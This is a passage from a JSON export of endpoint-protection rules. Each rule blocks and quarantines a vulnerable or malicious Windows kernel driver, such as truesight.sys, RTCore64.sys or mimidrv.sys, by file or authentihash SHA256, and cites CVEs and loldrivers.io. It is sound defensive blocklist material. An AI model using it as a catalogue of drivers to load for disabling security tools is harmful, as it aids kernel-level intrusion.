+ "last_update": "2026-03-23T11:45:31.824348Z",
+ "creation_date": "2026-03-23T11:45:31.824351Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824360Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a1921a4cf383b837935c4108ce3369680b097cfc1b05e685e26d53f8bce22c0d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ef0b5f79-66a4-5adf-b74d-71a281deee4f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148434Z",
+ "creation_date": "2026-03-23T11:45:31.148435Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148441Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b19a70942d8a2712416840edb13c6efd0ba483fa62e68496ea437ced7b9519dd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ef111985-c75f-5ada-bc6a-07dcb46fbdb2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978336Z",
+ "creation_date": "2026-03-23T11:45:29.978338Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978343Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3f55375fb70cb355fe7de7f59904b12ef996447cbc7113fefa379995e040d678",
+ "comment": "Malicious Kernel Driver (aka wantd_4.sys) [https://www.loldrivers.io/drivers/72637cb1-5ca2-4ad0-a5df-20da17b231b5/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ef11a8dc-0bc9-5b08-a7c8-a7a85ae901e9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808432Z",
+ "creation_date": "2026-03-23T11:45:31.808434Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808440Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5319f51a82e9725a01e7c6c00bab47a6223aa2b5e36ea39428225ee06cf06247",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ef1c56ab-e16f-5204-a51d-8029bd4bc19c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.807351Z",
+ "creation_date": "2026-03-23T11:45:31.807353Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.807359Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3bd87b14bf7ea7b946b02aab0f20947ffa672219bfb1683bb2cc8a537978e121",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ef3bc8fd-d979-5543-ab4d-ea5b12285673",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978686Z",
+ "creation_date": "2026-03-23T11:45:29.978688Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978693Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5b9623da9ba8e5c80c49473f40ffe7ad315dcadffc3230afdc9d9226d60a715a",
+ "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ef40c6b9-422b-5ac6-b5fa-94ed9300a78b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615798Z",
+ "creation_date": "2026-03-23T11:45:29.615800Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615806Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "826e80ea5f657c75127c066b86caea8089f33b09b12c3d393fca8efedd40c1ef",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ef55c5dd-d7aa-59db-82b2-e98e93056af0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.456018Z",
+ "creation_date": "2026-03-23T11:45:30.456022Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.456031Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c191c7d4ec03c4ef0f51a67af42a90390f75ebd6f83dbc05e317fe5a90a1fb31",
+ "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ef57c6b0-6e84-54a9-a434-f431fbf641f8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492556Z",
+ "creation_date": "2026-03-23T11:45:31.492558Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492564Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "210b908936b7bcd3883c3e5b8924fdce25cba194f042e973125205307880af06",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ef63870b-2700-583e-951d-5a7214d58905",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608705Z",
+ "creation_date": "2026-03-23T11:45:29.608707Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608712Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8ff48482c844ad0ab51365b9286197bc3c3173f02d62fc7ded68fc2b299b448b",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ef6a0c1b-977e-5c3a-a7ca-b6add94c0eed",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144018Z",
+ "creation_date": "2026-03-23T11:45:32.144020Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144026Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "77cb09dc2fc3c56f3b12ad03a85cedbe3a8e0bb876dadfd76a1fb6c57602817b",
+ "comment": "Malicious Kernel Driver (aka driver_090d409f.sys) [https://www.loldrivers.io/drivers/00561455-9da1-4f0c-8564-e4c99b716a74/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ef6b9b15-a457-5b5b-843e-1e9ca9540352",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160047Z",
+ "creation_date": "2026-03-23T11:45:31.160049Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160054Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "111a37b0a0fbb135ad69da789e5ea53985c444dd0d6f91713c6bdd0d1060524c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ef719e5e-f04f-51f3-8c70-1ad369707863",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489109Z",
+ "creation_date": "2026-03-23T11:45:31.489111Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489116Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "77e344edd8e09c77c87843e37de9a5f286a1db3d41f8593bc970efa7a2a0433d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ef71cb45-3dc1-5ba4-b99a-03796755eb52",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985063Z",
+ "creation_date": "2026-03-23T11:45:29.985065Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985071Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f5215f83138901ca7ade60c2222446fa3dd7e8900a745bd339f8a596cb29356c",
+ "comment": "Dangerous Physmem Kernel Driver (aka Dh_Kernel.Sys) [https://www.loldrivers.io/drivers/dfce8b0f-d857-4808-80ef-61273c7a4183/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ef785546-217b-55f6-b8ef-e431343e35e2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494710Z",
+ "creation_date": "2026-03-23T11:45:31.494712Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494718Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "da2330df96145c6bafe1563867de202570112737ea27da2e43bb4ec11e66db25",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ef79d680-d697-54d1-85f1-cb2b858b5ef8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460579Z",
+ "creation_date": "2026-03-23T11:45:30.460583Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460592Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1c425793a8ce87be916969d6d7e9dd0687b181565c3b483ce53ad1ec6fb72a17",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ef7f376d-04eb-5cdb-823c-c923c15db51d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.469369Z",
+ "creation_date": "2026-03-23T11:45:30.469372Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.469381Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fde2df81ad28f2306a2daf636041eb747a035d8f08709cdac2d53987d9edef4a",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ef862a0c-d4d2-5882-a33e-4fcbb2db018a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155241Z",
+ "creation_date": "2026-03-23T11:45:31.155243Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155248Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "14c2cc0a314f51750e274f339c057b88509ec0ff996d1ba13d19317834848019",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ef8baf7d-9f53-5e5d-a45f-e2206661bc77",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829386Z",
+ "creation_date": "2026-03-23T11:45:31.829389Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829398Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ec978cd1362e1f6d9c0afab0a13d9cb10cf9ef35d674451c4c67ad934877a147",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ef93f228-7cb5-5c11-a2d3-c55ae5a65410",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619575Z",
+ "creation_date": "2026-03-23T11:45:29.619577Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619582Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "34f6f68262fb25da9f6c974d6c2be8deb02b251506c847a4d6fc15f0cf5613a0",
+ "comment": "Insyde Software dangerous update tool (aka segwindrvx64.sys) [https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Program%3AWin32%2FVulnInsydeDriver.A&threatid=258247] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "efa69846-5793-5974-a73e-7e1ad7b0ad39",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.471745Z",
+ "creation_date": "2026-03-23T11:45:31.471748Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.471758Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b35ac0a4ee6955a86abdbcc13576b77f4207c67a203e9e3b288cb15a0c7f9e49",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "efa89129-e939-53c8-babe-3780cfc5a234",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826765Z",
+ "creation_date": "2026-03-23T11:45:31.826767Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826772Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "51ad1bbbf59f79eeb923399825ec464589be427c5611d64bb5d47df7a3273240",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "efb244d0-676f-5216-bfe1-945af34706c8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972248Z",
+ "creation_date": "2026-03-23T11:45:29.972250Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
